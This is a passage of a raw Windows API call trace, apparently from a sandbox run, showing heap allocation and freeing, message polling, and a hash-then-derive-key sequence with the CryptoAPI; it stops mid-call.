[0198.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0198.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0198.335] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0198.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0198.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0198.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0198.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0198.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0198.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0198.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0198.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0198.335] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.335] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0198.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0198.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0198.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0198.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0198.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0198.335] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0198.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0198.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0198.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0198.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0198.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0198.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0198.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0198.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0198.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0198.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0198.336] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0198.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0198.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0198.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0198.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0198.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0198.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0198.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0198.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0198.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0198.336] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0198.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0198.337] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.337] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0198.337] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.337] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0198.337] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.337] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.337] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.337] CryptHashData (hHash=0xaa58e0, pbData=0x24b1838, dwDataLen=0x3, dwFlags=0x1) returned 1 [0198.337] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.337] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.337] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.337] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0198.337] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.337] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0198.337] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.337] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.338] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0198.338] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.338] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0198.338] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.338] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.338] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.338] CryptDeriveKey (in: hProv=0xad6480, Algid=0x6601, hBaseData=0xaa58e0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5660) returned 1 [0198.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0198.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0198.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0198.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0198.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0198.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0198.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0198.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0198.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0198.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0198.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0198.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0198.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0198.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0198.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0198.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0198.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0198.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0198.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0198.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0198.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0198.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0198.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0198.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0198.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0198.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0198.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0198.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0198.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0198.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0198.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0198.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0198.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0198.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0198.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0198.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0198.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0198.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0198.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0198.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0198.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0198.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0198.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0198.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0198.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0198.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0198.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0198.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0198.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0198.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0198.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0198.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0198.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0198.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0198.341] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0198.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0198.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0198.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0198.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0198.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0198.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0198.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0198.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0198.342] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0198.342] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0198.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0198.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0198.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0198.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0198.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0198.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0198.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0198.342] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0198.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0198.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0198.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0198.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0198.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0198.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0198.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0198.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0198.343] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0198.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0198.343] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0198.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0198.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0198.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0198.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0198.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0198.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0198.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0198.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0198.343] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0198.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0198.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0198.343] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0198.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0198.344] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0198.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0198.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0198.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0198.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0198.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0198.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0198.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0198.344] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0198.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0198.344] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0198.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0198.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0198.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0198.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0198.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0198.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0198.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0198.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0198.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0198.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0198.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0198.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0198.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0198.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0198.345] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0198.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0198.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0198.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0198.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0198.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0198.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0198.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0198.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, 